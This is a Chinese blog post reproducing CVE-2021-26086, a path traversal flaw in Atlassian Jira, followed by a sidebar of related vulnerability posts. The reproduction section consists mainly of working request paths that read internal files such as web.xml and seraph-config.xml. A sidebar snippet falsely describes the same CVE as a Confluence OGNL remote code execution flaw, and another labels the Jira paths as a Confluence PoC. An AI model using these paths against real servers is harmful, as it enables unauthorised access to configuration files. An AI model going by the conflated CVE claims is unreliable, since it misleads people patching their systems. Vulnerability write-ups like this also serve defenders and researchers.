Atlassian Jira 路径遍历 (CVE-2021-26086)

于 2024-07-19 10:06:16 发布
阅读量274 收藏
点赞数 1
分类专栏: # 目录穿越/遍历 文章标签: atlassian jira
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23003811/article/details/140541337
版权

一、漏洞概述

Atlassian JIRA是一个项目管理和开发管理工具,Atlassian Jira 服务器和数据中心版本允许远程攻击者通过 /WEB-INF/web.xml 端点中的路径遍历漏洞读取特定文件。

二、影响范围

8.5.14 之前的版本

8.13.6 之前的 8.6.0 版本

8.16.1 之前的 8.14.0 版本

三、访问页面

四、漏洞复现

1、访问/WEB-INF/目录下的文件,跳不出/WEB-INF/目录。

/s/cfx/_/;/WEB-INF/web.xml

2、可以访问的一些文件

/s/xx/_/;/WEB-INF/web.xml 
/s/xx/_/;/WEB-INF/decorators.xml 
/s/xx/_/;/WEB-INF/classes/seraph-config.xml 
/s/xx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties 
/s/xx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml 
/s/xx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml 
/s/xx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties

风中追风-fzzf
关注
专栏目录
Confluence漏洞学习——CVE-2021-26084/85,CVE-2022-26134漏洞复现
记录并分享学习安全的知识点..
07-24 2972
Atlassian Confluence是Atlassian公司出品的专业wiki程序。它可以作为一个知识管理的工具,通过它能够实现团队成员之间的协作和知识共享。攻击者在经过身份验证或在特定环境下未经身份验证的情况下,可构造OGNL表达式进行注入,实现在 Confluence Server或Data Center上执行任意代码。 ​.........
斗象-2023攻防演练必修高危漏洞集合(水印)
08-11
高危风险漏洞一直是企业网络安全防护的薄弱点,也成为HW 攻防演练期间 红队的重要突破口;每年HW 期间爆发了大量的高危风险漏洞成为红队突破网络 边界防护的一把利器,很多企业因为这些高危漏洞而导致整个防御体系被突破、 甚至靶标失守而遗憾出局。 HW 攻防演练在即,斗象情报中心依托漏洞盒子的海量漏洞数据、情报星球 社区的一手漏洞情报资源以及Freebuf 安全门户的安全咨询进行分析整合,输出 HW 必修高危漏洞手册,意在帮助企业在HW 攻防演练的前期进行自我风险排查, 降低因高危漏洞而“城池失守”的风险。 本次报告整合了近两年在攻防演练被红队利用最频繁且对企业危害较高的 漏洞,包含了详细的漏洞基础信息、检测规则和修复方案,企业可根据自身资产 信息进行针对性的排查、配置封堵策略和漏洞修复相关工作。 斗象智能安全PRS 已支持详细检测规则,如需要协助请联系:400-156-986 6 HW 必修高危漏洞集合持续更新中,请持续关注。
Atlassian Jira 信息泄露漏洞(CVE-2019-3403) 排查思路
HeLLo_a119的博客
04-28 800
企业广泛使用的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。如果是正常的访问也会返回敏感数据,返回包中的敏感信息是正常的响应内容,所以他不算是一次攻击成功,算是误报。告警的检测规则是匹配响应中有没有返回数据包里面带有敏感信息的部分(检测URL和响应体)。如果是内部人员正常的操作,可以确定这是一次误报,但是不能确定他存不存在这个漏洞。2.通过受害者IP地址找到对应的人员并确认他们是否进行了可能的不当操作。信息泄露漏洞的告警。
近两年常用的RCE漏洞收集
Websec
04-11 5456
1、Spring Cloud RCE CVE-2022-22965 https://github.com/fullhunt/spring4shell-scan log4j漏洞: https://github.com/fullhunt/log4j-scan/blob/master/log4j-scan.py 2、weblogic反序列化 WeblogicScan:https://github.com/rabbitmask/WeblogicScan 3、shiro反序列化 shiroExploit:https:
通报:Confluence远程代码执行漏洞(CVE-2021-26084)被黑产大规模利用
qcloud_security的博客
09-06 1812
8月26日,Atlassian官方发布公告,披露了一个Atlassian Confluence 远程代码执行漏洞(CVE-2021-26084),攻击者利用漏洞可完全控制服务器。8月31日晚,腾讯云原生安全漏洞检测响应平台通过主机安全(云镜)检测到首个利用该漏洞的在野攻击案例。 腾讯安全旗下全系列企业级产品均已支持检测防御利用Atlassian Confluence远程代码执行漏洞的攻击活动。 腾讯云上安全产品全栈提供针对Confluence远程代码执行漏洞的检测防护能力,政企用户运维人员.
漏洞笔记--Jira 相关漏洞复现及利用
NoooEmotion的博客
01-28 4787
Atlassian Jira是企业广泛使用的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。
Jira相关CVE
公众号shadow sock7
05-07 334
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13387 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13400 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13404 https://cve.mi...
vulfocus靶场通关(目录遍历)
信安是不可或缺的一部分!
01-31 2446
该框架使用了特定的方式来进行配置,从而使开发人员不再需要定义样板化的配置。但是,删除运行应用程序的用户对运行应用程序不需要的任何目录的读取访问权限可以限制影响。受影响的版本为 8.5.14 之前的版本、8.13.6 之前的 8.6.0 版本以及 8.16.1 之前的 8.14.0 版本。uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议,并支持通过插件来运行各种语言,uWSGI 2.0.17之前的PHP插件,没有正确的处理DOCUMENT_ROOT检测,导致用户可以通过…
Confluence文件读取漏洞复现
Websec
03-06 1361
1、Confluence系统都存在漏洞,漏洞poc如下: /s/xx/_/;/WEB-INF/web.xml /s/xx/_/;/WEB-INF/decorators.xml /s/xx/_/;/WEB-INF/classes/seraph-config.xml /s/xx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties /s/xx/_/;/META-INF/maven/com.atlassian.jir
Atlassian Jira 模板注入漏洞(CVE-2019-11581)复现
玄道的网安博客
12-13 1582
漏洞描述 Atlassian Jira是企业广泛使用的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。 多个版本前存在利用模板注入执行任意命令: 影响范围 4.4.x 5.x.x 6.x.x 7.0.x 7.1.x 7.2.x 7.3.x 7.4.x 7.5.x 7.6.x before 7.6.14 (the fixed version for 7.6.x) 7.7.x 7.8.x 7.9.x 7.10.x 7.11...
Atlassian Jira的客户库-Golang开发
05-26
go-jira Atlassian JIRA的Go客户库。 功能身份验证(HTTP Basic,OAuth,会话Cookie)创建和接收问题创建和检索问题转换(状态更新)调用每个API go-jira Go Atlassian Jira的客户端库。 功能身份验证(HTTP Basic,...
jira-java-client:Atlassian Jira 的 Java 客户端
06-13
Atlassian Jira 的 Java 客户端 Atlassian Jira 的一个不完整的Java 客户端。 目前我们只用我们需要的东西来扩展它,但我们很高兴应用你的拉取请求 :D 大多数 Jira REST API 由(官方?) 基本用法 以最简单的形式...
atlassian-jira-software-7.8.1-x64.bin
09-10
JIRAAtlassian公司出品的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。
confluence的几个高危漏洞复现
fly夏天的博客
12-06 3865
CVE-2021-26084 CVE-2022-26134 漏洞复现
Confluence CVE-2021-26084远程代码执行漏洞复现
热门推荐
Websec
09-08 1万+
一、漏洞概述 近日,Atlassian官方发布了ConfluenceServerWebworkOGNL注入漏洞(CVE-2021-26084)的安全公告,远程攻击者在经过身份验证或在特定环境下未经身份验证的情况下,可构造OGNL表达式进行注入,实现在 Confluence Server或Data Center上执行任意代码,CVSS评分为9.8。请相关用户尽快采取措施进行防护。 Atlassian Confluence是Atlassian公司出品的专业wiki程序。它可以作为一个知识管理的工具,...
CVE-2021-26084——Confluence OGNL 注入漏洞分析
战神/calmness的博客
09-04 2298
简述 2021年08月26日,Atlassian官方发布了Confluence OGNL 注入漏洞的风险通告,漏洞编号为CVE-2021-26084,漏洞等级:严重,漏洞评分:8.8。目前该漏洞安全补丁已更新。 Confluence是Atlassian公司的一个专业的企业知识管理与协同软件,也可以用于构建企业wiki,因此,Confluence的使用面很广。在某些情况下,未授权的攻击者可以构造特殊的请求,造成远程代码执行。 影响版本 组件
Microsoft Exchange多个高危漏洞 (CVE-2021-26855/26857/26858/27065)
爱国小白帽
03-05 6786
\1. 通告信息 2021年03月04日,安识科技A-Team团队监测到微软官方发布了Microsoft Exchange安全更新,披露了包括CVE-2021-26855,CVE-2021-26857,CVE-2021-26858,CVE-2021-27065等多个高危漏洞。 \2. 漏洞概述 Microsoft Exchange Server 是个消息与协作系统。Exchange Server可以被用来构架应用于企业、学校的邮件系统或免费邮件系统。2021年03月03日微软官方披露多个Excha.
Windows DNS Server 远程代码执行漏洞 (CVE-2021-24078) 的详细原理分析
smellycat000的专栏
02-11 3350
聚焦源代码安全,网罗国内外最新资讯!漏洞简介Windows DNS Server 是 Windows Server 服务器上的一项重要功能组件, 负责调度和处理域内主机的所有DNS相关服...
CVE-2021-26086
最新发布
05-22
CVE-2021-26086是一个影响Atlassian Confluence Server和Data Center的高危漏洞。攻击者可以利用这个漏洞执行远程代码,可能导致服务器完全被控制。这个漏洞是因为Confluence Server和Data Center中的Ognl表达式注入漏洞造成的,攻击者可以通过发送经过修改的HTTP请求,注入恶意代码,从而远程执行代码。 Atlassian已经发布了相关的安全公告,并提供了补丁程序。如果您正在使用受影响的版本,请立即更新到最新版本以保护您的系统安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值